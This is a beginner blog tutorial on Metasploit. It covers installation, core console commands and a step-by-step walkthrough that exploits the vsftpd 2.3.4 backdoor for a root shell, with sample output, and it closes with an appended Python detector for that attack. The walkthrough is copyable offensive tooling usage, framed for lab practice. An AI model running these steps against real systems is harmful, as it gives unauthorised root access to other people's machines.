Metasploit: A Beginner-Friendly Guide
- Diniz Martins
- May 7
🔍 What is Metasploit?
Metasploit is an open-source penetration testing framework developed by Rapid7. It helps security professionals find, exploit, and validate vulnerabilities in systems—legally, of course. You can think of it like a Swiss Army knife for hackers (the good kind).
With Metasploit, you can:
- Run exploits on known vulnerabilities.
- Test systems for weaknesses.
- Create your own payloads and listeners.
- Conduct post-exploitation tasks.
⚙️ How Does Metasploit Work?
At its core, Metasploit works in three main steps:
1. Scanning – You identify the target system and gather information about open ports, services, and potential vulnerabilities (tools like Nmap can help here).
2. Exploitation – You choose a known vulnerability (exploit) and a method to access the system (payload).
3. Post-Exploitation – Once inside, you can explore the system further: open a shell, read files, dump passwords, or escalate privileges.
🐉 Installing Metasploit on Kali Linux
Luckily, Metasploit comes pre-installed with most versions of Kali Linux. But if for some reason it's missing or you want to install it manually, here’s how:
🔧 Installation via Terminal:
sudo apt update
sudo apt install metasploit-framework
You can verify the installation with:
msfconsole --version
If you want the latest version from Rapid7, you can install it using their script:
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfinstall > msfinstall
chmod +x msfinstall
./msfinstall
💻 Starting Metasploit
To launch the Metasploit console, use:
msfconsole
It may take a few seconds to load, but once it does, you’ll see the familiar banner and prompt:
msf6 >
You're now in Metasploit!
🛠️ Basic Commands to Get You Started
Here are some essential commands to help you navigate:
| Command | Description |
|---|---|
| search <keyword> | Search for modules, exploits, payloads |
| use <module> | Load a specific module |
| show options | Display required settings for the module |
| set <option> <value> | Set a value (like RHOST or PAYLOAD) |
| exploit or run | Launch the exploit |
| exit | Quit Metasploit |
🧠 Tips for Beginners
- Always use Metasploit in legal and controlled environments.
- Pair it with tools like Nmap, Wireshark, and Burp Suite.
- Practice using vulnerable VMs like Metasploitable, DVWA, or Hack The Box labs.
- Learn the difference between exploit, payload, module, and session.
🧪 Practical Example: Exploiting vsftpd 2.3.4 with Metasploit
✅ Objective:
Gain a shell on a target machine running a vulnerable FTP service (vsftpd 2.3.4).
🔧 Step-by-step Guide:
1. Launch Metasploit Console
msfconsole
2. Search for the Exploit
search vsftpd
Output:
exploit/unix/ftp/vsftpd_234_backdoor
3. Use the Exploit Module
use exploit/unix/ftp/vsftpd_234_backdoor
4. Set Target IP Address
set RHOST <ip_host>
5. (Optional) Confirm Options
show options
6. Launch the Exploit
run
7. Shell Access
If successful, you’ll get something like this:
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.100:6200)
Type whoami, uname -a, or id to start interacting with the system:
whoami
Output:
root
You now have a root shell on the target machine! 💻🔓
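From the defender's side, this walkthrough leaves two observable signals: an FTP greeting that reports vsFTPd 2.3.4, and a connection to TCP 6200 on the FTP server shortly after the same client connected to port 21, as in the session line above. The Python below is an added example, not part of the original post; the banner inventory, the flow-log format, the addresses and the 30-second window are constructed assumptions.

```python
import re

# Constructed sample data (assumptions, not from the original post).
BANNERS = {
    "192.168.1.100": "220 (vsFTPd 2.3.4)",
    "192.168.1.50": "220 (vsFTPd 3.0.5)",
}
# Constructed flow log: epoch_seconds source destination destination_port
FLOWS = """\
1700000000 192.168.1.101 192.168.1.100 21
1700000002 192.168.1.101 192.168.1.100 6200
1700000100 192.168.1.77 192.168.1.50 21
1700000105 192.168.1.77 192.168.1.50 6200
1700000200 192.168.1.88 192.168.1.100 21
1700000900 192.168.1.88 192.168.1.100 6200
not a flow record
"""

VULN_BANNER = re.compile(r"vsftpd\s+2\.3\.4\b", re.IGNORECASE)
FTP_PORT, SHELL_PORT = 21, 6200  # 6200 is the port in the session line above

def vulnerable_hosts(banners):
    """Hosts whose FTP greeting reports the backdoored release."""
    return {host for host, banner in banners.items() if VULN_BANNER.search(banner)}

def parse_flows(text):
    """Yield (timestamp, src, dst, dport) tuples, skipping malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[0].isdigit() and parts[3].isdigit():
            yield int(parts[0]), parts[1], parts[2], int(parts[3])

def detect(flows_text, banners, window=30):
    """Flag dst:6200 connections that follow the same src hitting dst:21 within `window` s."""
    vulnerable = vulnerable_hosts(banners)
    last_ftp = {}  # (src, dst) -> time of the most recent FTP connection
    alerts = []
    for ts, src, dst, dport in sorted(parse_flows(flows_text)):
        if dport == FTP_PORT:
            last_ftp[(src, dst)] = ts
        elif dport == SHELL_PORT and (src, dst) in last_ftp:
            delay = ts - last_ftp[(src, dst)]
            if delay <= window:
                severity = "high" if dst in vulnerable else "review"
                alerts.append({"src": src, "dst": dst, "delay": delay, "severity": severity})
    return alerts

if __name__ == "__main__":
    print(*detect(FLOWS, BANNERS), sep="\n")
```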